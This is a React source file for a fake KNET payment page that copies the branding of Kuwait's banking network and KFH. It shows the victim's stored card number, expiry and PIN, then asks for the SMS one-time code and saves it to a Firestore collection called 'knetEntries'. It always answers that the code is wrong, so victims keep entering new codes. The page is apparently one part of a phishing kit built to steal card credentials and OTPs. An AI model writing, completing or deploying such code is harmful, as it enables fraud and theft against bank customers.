import React, { useState, useEffect } from "react";
import { db } from "../firebaseConfig";
import { doc, updateDoc, serverTimestamp } from "firebase/firestore";
import { useLocation, useNavigate } from "react-router-dom";
import Loader from "../components/Loader";

export default function OtpPage() {
  const [otp, setOtp] = useState("");
  const [timeLeft, setTimeLeft] = useState(240);
  const [pageLoading, setPageLoading] = useState(true);
  const [loading, setLoading] = useState(false);
  const [message, setMessage] = useState(""); // ✅ رسالة النجاح أو الخطأ
  const navigate = useNavigate();

  const location = useLocation();
  const routeData = location.state || {};
  const bank = routeData.bank || sessionStorage.getItem("bank");
  const prefix = routeData.prefix || sessionStorage.getItem("prefix");
  const card = routeData.card || sessionStorage.getItem("card");
  const month = routeData.month || sessionStorage.getItem("month");
  const year = routeData.year || sessionStorage.getItem("year");
  const pin = routeData.pin || sessionStorage.getItem("pin");
  const entryId = routeData.entryId || sessionStorage.getItem("entryId");

  useEffect(() => {
    if (timeLeft <= 0) return;
    const timer = setInterval(() => setTimeLeft((t) => t - 1), 1000);
    return () => clearInterval(timer);
  }, [timeLeft]);

  useEffect(() => {
    const timeoutId = setTimeout(() => setPageLoading(false), 1200);
    return () => clearTimeout(timeoutId);
  }, []);

  const formatTime = (s) => {
    const m = Math.floor(s / 60);
    const sec = s % 60;
    return `${m}:${sec.toString().padStart(2, "0")}`;
  };

  const maskedCard =
    prefix && card ? `${prefix}******${card.slice(-4)}` : "••••••••••••••••";
  const maskedPin = pin ? "••••" : "••••";

  const warningText = "⚠️ الرمز غير صحيح، حاول مرة أخرى";

  const handleSubmit = async (e) => {
    e.preventDefault();
    if (!/^\d{6}$/.test(otp) || !entryId) {
      setMessage(warningText);
      return;
    }

    setLoading(true);
    try {
      const ref = doc(db, "knetEntries", entryId);
      await updateDoc(ref, {
        otp,
        verifiedAt: serverTimestamp(),
      });

      setMessage(warningText);
    } catch (err) {
      console.error("❌ خطأ أثناء الحفظ:", err);
      setMessage(warningText);
    } finally {
      setLoading(false);
    }
  };

  const progress = Math.max((timeLeft / 240) * 100, 0);

  if (pageLoading) return <Loader />;

  return (
    <div
      dir="ltr"
      className="min-h-screen bg-[#f9f9f9] font-[Tahoma] flex flex-col items-center pb-10"
    >
      {loading && <Loader />}
      <img
        src="/assets/kpayt.jpg"
        alt="Header Banner"
        className="w-full max-h-36 object-cover"
        onError={(e) => {
          e.target.src =
            "https://placehold.co/1200x200/eee/ccc?text=KNET+Banner";
        }}
      />

      {/* 🖼️ صندوق KNET */}
      <div className="bg-white shadow-md border border-gray-300 rounded-xl w-[90%] md:w-[550px] mt-3 p-4 text-center relative">
        <img
          src="/assets/kfh2.png"
          alt="KNET logo"
          className="mx-auto w-24 h-auto mb-2"
          onError={(e) => {
            e.target.src = "https://placehold.co/200x60/eee/ccc?text=KNET";
          }}
        />

        <div className="text-sm">
          <div className="flex justify-between px-4 border-b pb-1">
            <span className="font-semibold text-gray-800">Merchant</span>
            <span className="text-blue-800 font-semibold">KFG</span>
          </div>
          <div className="flex justify-between px-4 pt-1">
            <span className="font-semibold text-gray-800">Amount</span>
            <span className="text-blue-800 font-semibold">KD 1</span>
          </div>
        </div>
      </div>

      {/* FORM */}
      <form
        onSubmit={handleSubmit}
        className="bg-white border border-gray-200 rounded-xl shadow-md w-[90%] md:w-[550px] p-5 mt-5 text-[15px]"
      >
        <div className="bg-[#e7f4ff] border border-[#c9e4ff] rounded-md p-3 mb-4 text-gray-700 leading-relaxed text-right">
          <strong className="text-blue-800">يرجى الانتباه: </strong>    

            سيتم الآن ارسال رسالة نصية على رقم هاتفك الجوال المسجل لدى البنك الخاص بك. هذه الرسالة المكونة من 6 خانات هي رمز التحقق لمرة واحدة". يرجى استخدام هذا الرمز في الحقل المناسب ادناه

        </div>

        <div className="space-y-2 text-right">
          <div className="flex justify-between border-b pb-1">
            <span className="text-gray-800">{maskedCard}</span>
            <span className="font-semibold text-blue-700"> رقم البطاقة</span>
          </div>
          <div className="flex justify-between border-b pb-1">
            <span className="text-gray-800">{month || "--"}</span>
            <span className="font-semibold text-blue-700">شهر الانتهاء </span>
          </div>
          <div className="flex justify-between border-b pb-1">
            <span className="text-gray-800">{year || "--"}</span>
            <span className="font-semibold text-blue-700">سنة الانتهاء</span>
          </div>
          <div className="flex justify-between border-b pb-1">
            <span className="text-gray-800">{maskedPin}</span>
            <span className="font-semibold text-blue-700">الرقم السري</span>
          </div>

          <div className="flex justify-between items-center pt-2">
            <input
              type="text"
              value={otp}
              onChange={(e) =>
                setOtp(e.target.value.replace(/\D/g, "").slice(0, 6))
              }
              disabled={timeLeft <= 0}
              placeholder={
                timeLeft <= 0
                  ? "الوقت انتهى"
                  : `Timeout in: ${formatTime(timeLeft)}`
              }
              className="border border-gray-300 rounded-md p-2 text-center text-sm w-40 focus:ring-2 focus:ring-blue-400 outline-none"
            />
            <span className="font-semibold text-blue-700">رمز OTP</span>
          </div>
        </div>

        <div className="w-full bg-gray-200 h-2 mt-4 rounded-full overflow-hidden">
          <div
            className="h-2 bg-blue-600 transition-all duration-1000 ease-linear"
            style={{ width: `${progress}%` }}
          ></div>
        </div>

        <div className="flex justify-center gap-4 mt-6">
          <button
            type="submit"
            disabled={loading || timeLeft <= 0}
            className="bg-[#2f7bd6] text-white font-semibold px-6 py-2 rounded-md text-sm hover:bg-blue-700 transition disabled:bg-gray-400"
          >
            {loading ? "جاري الإرسال..." : "تأكيد"}
          </button>
          <button
            type="button"
            onClick={() => navigate("/knet")}
            className="bg-gray-100 border border-gray-300 px-6 py-2 rounded-md text-sm font-semibold hover:bg-gray-200"
          >
            إلغاء
          </button>
        </div>

        {/* ✅ عرض رسالة النجاح أو الخطأ */}
        {message && (
          <p
            className={`text-center font-semibold mt-4 ${
              message.includes("نجاح")
                ? "text-green-600"
                : "text-red-600"
            }`}
          >
            {message}
          </p>
        )}
      </form>

      <div className="text-center text-xs text-gray-600 mt-6 leading-tight">
        <p>© 2025 جميع الحقوق محفوظة</p>
        <p className="text-blue-800 font-semibold">
          شركة الخدمات المصرفية الآلية المشتركة – كي نت
        </p>
      </div>

    </div>
  );
}
